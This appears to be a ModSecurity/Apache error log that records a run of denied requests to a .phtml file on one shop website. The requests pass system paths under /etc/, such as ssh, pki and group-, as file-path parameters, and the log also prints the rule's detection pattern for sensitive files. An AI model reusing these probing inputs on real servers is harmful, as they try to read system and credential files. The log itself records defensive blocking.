[Thu Mar 19 16:06:05.340827 2026] [:error] [pid 5816:tid 140411649607424] [client 57.141.18.67:59856] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJHZfmNfuxceSuAEK6OAAAAcs"]
[Thu Mar 19 16:06:05.498293 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.93:59858] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJHfXLqtnMIWvjpaJDTwAAApI"]
[Thu Mar 19 16:06:05.848101 2026] [:error] [pid 19655:tid 140411632822016] [client 57.141.18.28:59864] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJHU1ujooLWdUDGy75xgAAAE0"]
[Thu Mar 19 16:06:06.265398 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.104:59870] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJHvXLqtnMIWvjpaJDUAAAApA"]
[Thu Mar 19 16:06:07.849535 2026] [:error] [pid 17887:tid 140411624429312] [client 57.141.18.34:59906] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJHwkwaGbbGflqUZDwCwAAAM4"]
[Thu Mar 19 16:06:08.152909 2026] [:error] [pid 21563:tid 140411574073088] [client 57.141.18.100:59912] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJIEpm7ZmxKZTM4bZpXgAAA5Q"]
[Thu Mar 19 16:06:09.761825 2026] [:error] [pid 21219:tid 140411540502272] [client 57.141.18.3:59922] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJIPXLqtnMIWvjpaJDVAAAApg"]
[Thu Mar 19 16:06:09.762919 2026] [:error] [pid 7893:tid 140411691570944] [client 57.141.18.50:59930] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJIBCii7xarUs8iHYPBQAAAgY"]
[Thu Mar 19 16:06:09.765032 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.117:59936] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJIfXLqtnMIWvjpaJDVQAAApI"]
[Thu Mar 19 16:06:10.897759 2026] [:error] [pid 5816:tid 140411649607424] [client 57.141.18.20:59966] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJIpfmNfuxceSuAEK6PgAAAcs"]
[Thu Mar 19 16:06:10.997668 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.52:59970] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJIhCii7xarUs8iHYPBwAAAgQ"]
[Thu Mar 19 16:06:11.326424 2026] [:error] [pid 21219:tid 140411540502272] [client 57.141.18.107:59974] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJI_XLqtnMIWvjpaJDVwAAApg"]
[Thu Mar 19 16:06:11.612860 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.24:59978] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJI_XLqtnMIWvjpaJDWAAAAoM"]
[Thu Mar 19 16:06:12.454902 2026] [:error] [pid 8307:tid 140411624429312] [client 57.141.18.93:60000] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJJL-FhjpZGs9ba8qPbwAAAw4"]
[Thu Mar 19 16:06:12.886131 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.92:60006] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJJBCii7xarUs8iHYPCQAAAgQ"]
[Thu Mar 19 16:06:12.939563 2026] [:error] [pid 21219:tid 140411540502272] [client 57.141.18.7:60010] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJJPXLqtnMIWvjpaJDWgAAApg"]
[Thu Mar 19 16:06:13.786504 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.122:60026] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJJf-YZRR_7pZ7nDKvvQAAA9E"]
[Thu Mar 19 16:06:16.073129 2026] [:error] [pid 21563:tid 140411716749056] [client 57.141.18.16:60096] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJKEpm7ZmxKZTM4bZpYwAAA4M"]
[Thu Mar 19 16:06:17.260501 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.103:60122] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJKfXLqtnMIWvjpaJDYAAAAoQ"]
[Thu Mar 19 16:06:17.899362 2026] [:error] [pid 27293:tid 140411540502272] [client 57.141.18.12:60138] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJKf-YZRR_7pZ7nDKvwQAAA9g"]
[Thu Mar 19 16:06:18.200903 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.63:60142] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJKuoXxyEfFpUF8f8xYAAAAU8"]
[Thu Mar 19 16:06:19.326935 2026] [:error] [pid 7235:tid 140411699963648] [client 57.141.18.110:60164] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJK_qxLDW4GITHUkSNrQAAAQU"]
[Thu Mar 19 16:06:19.846098 2026] [:error] [pid 5816:tid 140411708356352] [client 57.141.18.97:60176] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJK5fmNfuxceSuAEK6QwAAAcQ"]
[Thu Mar 19 16:06:20.037819 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56220] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:06:20.212393 2026] [:error] [pid 5816:tid 140411708356352] [client 57.141.18.83:60190] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJLJfmNfuxceSuAEK6RAAAAcQ"]
[Thu Mar 19 16:06:20.438103 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.64:60204] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJLPXLqtnMIWvjpaJDZAAAApI"]
[Thu Mar 19 16:06:22.711154 2026] [:error] [pid 7235:tid 140411699963648] [client 57.141.18.56:60258] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJLvqxLDW4GITHUkSNsAAAAQU"]
[Thu Mar 19 16:06:22.712460 2026] [:error] [pid 21563:tid 140411574073088] [client 57.141.18.72:60260] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJLkpm7ZmxKZTM4bZpZQAAA5Q"]
[Thu Mar 19 16:06:22.713608 2026] [:error] [pid 21219:tid 140411540502272] [client 57.141.18.115:60244] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJLfXLqtnMIWvjpaJDZwAAApg"]
